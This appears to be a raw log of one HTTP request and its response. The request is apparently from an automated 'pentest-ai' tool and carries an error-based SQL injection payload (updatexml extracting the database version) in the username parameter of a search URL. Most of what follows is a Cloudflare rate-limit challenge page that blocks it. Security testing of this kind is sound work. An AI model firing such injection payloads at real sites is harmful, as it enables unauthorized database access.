REQUEST:
GET https://my.myfirst.tech/search?username=1%27%20AND%20updatexml%281%2Cconcat%280x7e%2C%28SELECT%20version%28%29%29%29%2C1%29--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9537
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8475b4ee1a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=8VmV8GepTitYHr7XzKwNWChrsIA4lLqV5tQfohAvWR2rYGzhn1LCGvxHt8lH7UOadVbRiuMv8eeSSVz1rF6dRnGLt3MX7Z4UvSDZUBRAXBoN7hz%2BwbfBF%2Fp%2FjHSt35qWLA%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8475b4ee1a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'DWkj.903YZnZg5RjbaXM6OhPPcv323VHWuD6.xOoU.0-1784281158-1.2.1.1-QRgEFktLOlatABz2yURGJ4irw2N3JlIInrLYsx2HgcGQ0Erqh5W7mIG9YZAeRDO8',cITimeS: '1784281158',cRay: 'a1c8475b4ee1a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?username=1%27+AND+updatexml%281%2Cconcat%280x7e%2C%28SELECT+version%28%29%29%29%2C1%29--\u0026__cf_chl_tk=L4okdG0Fai3SrI_qi39omYUDLjvI2jKdIoQlBAVXm8s-1784281158-1.0.1.1-uZGUoTvTxf2HL1LhlNcyncbf.RGIPOEY2EUU_0KE6i0",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?username=1%27+AND+updatexml%281%2Cconcat%280x7e%2C%28SELECT+version%28%29%29%29%2C1%29--\u0026__cf_chl_f_tk=L4okdG0Fai3SrI_qi39omYUDLjvI2jKdIoQlBAVXm8s-1784281158-1.0.1.1-uZGUoTvTxf2HL1LhlNcyncbf.RGIPOEY2EUU_0KE6i0",md: 'PHXEP9C8y4RQVG1eXOMmXab5zFPx10IRtNv_EQeKWd0-1784281158-1.2.1.1-.mdv09Z.4QhTXm6bCgyW6xD9aL.yIrRB6H6yFAX901TioJtdgAm9oSwOHFjyYpEqR0b3V6DBiAI2oENi7H3vplx8on_DlJJYqdHqKojy.2VLzojXxMeXwqBFEWTbz2XwSHyJivTnsfAU8dcstEADEh52BWTIsYGoK3qwbmYbuge6X85wy.NKYyQSqf3nUMFJavjfl5VH4B2jnmJKLkTpVVZzKwEBEV3uehLdhWDrBikttSVi.6aj97T4r4p1y6kWJDvqkqaDXW_6auQmpMj8Fe0pz3n9O92krVo9x8CDsJwB1pXVxczU2KFoEcc8EXaVuGm9JP1qLPbpWzUqBZqVS1J_Jjf.sC.cJthtg7Xguz88CYtU8nEpuywFrx2Fi38iTzdjGZwpjMDMDODumsl7AyfPW7TTUkvjxi6rxipwEAVGqzPbZ46sVfT6xvK2hm7gm0VPFXfYsiMU.VdMOFUgDgWPeSsiRZyXf0KE5rmKWUdoI5gFSV4PSNefRLtoZf4jewlzqDECufUOlp_pmsEFGgE5EbPDX0W7ikrYJH1c.aTeujS.C7iewM_gynM7pv06IWJbbJZPYdFwH.taczObf_NcTEpTRwo57suNU9AtABN5xQ0rtNEj_4_CLy4lKvWu1nnglxbJn.5T3qiB77dMamsoCkgSq1BRsVAlBEZdJS7YCZ5jU6Cf7BQisecACYBxpwUL.0e7abcXQwt2l8R7FODDIiM2exVG.zyXccJi12hS5DvQp8GXY34EUV8gB5teuhFZ9c6q16AjJaI3xFzkXreoIVxC1zW3mxnrE4tTT_QkH9Zji1iel_KUrB4d0PP0W6sPVCgc_zJTUYFpSDM.Nt06Us_qmqqzm2.k96mhhoqIdIVejuL7QTzpkIrI5Axb.v1xGQMXyFqvRW069HWqhuV_tPMbPxytE5uQ8yLdfmoAeuzfvADmh6ucFzDR3y2xS1ThKWkn_yWJ41buQ2K9U9XmcJLNlhWKPO9Xkc3c6YBwnchbvFDcV0xVC9yyFeTk6bDHM6JMKld_ZORr1OdBdReqgcime3LLT1bMxJgl2XGfz8Ai3FhRDO229WyK0dYbXjRH.8.inaGsq6k64x6WMb4OnrmrFwsMBzffBamC6CQOrFEtnSI.Q5N0ccwZAbyUiWYWVVdH0N1Hc3HVWBYTMcQfVKZKovZ9DRsdkxQEeudhk2ChfzHYY18Jw7ZLGwzVv_juroQOJTfloPXjj7uBVA',mdrd: 'fZZYCVakiliXxGH0fzp.6tok9TcAgtDTYp.NgLCy4r0-1784281158-1.2.1.1-HDKC8edI0mCfdSnI8Of1BcE5X0yCeVKwwCPmsBAAavdPj221tC49pD40L8dbKAknsKywTGCjEyCfvyQQHLXyuK4IPG2DBKgodVwxJYYz3J2Dh7t9HrOxJ_qprUd658uNdC5hvv4InRg5xOzk8FFCJc.XlENoOPcFNfqswakBkJ43X4KXzLu8UtxNnMsDHLXCjh35qijJpy1mEn85lJriLp_2ExWzkRySJ7ztnjml8mfPLmRR1hsd1VQw4XHJ3olO',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8475b4ee1a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?username=1%27+AND+updatexml%281%2Cconcat%280x7e%2C%28SELECT+version%28%29%29%29%2C1%29--\u0026__cf_chl_rt_tk=L4okdG0Fai3SrI_qi39omYUDLjvI2jKdIoQlBAVXm8s-1784281158-1.0.1.1-uZGUoTvTxf2HL1LhlNcyncbf.RGIPOEY2EUU_0KE6i0"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
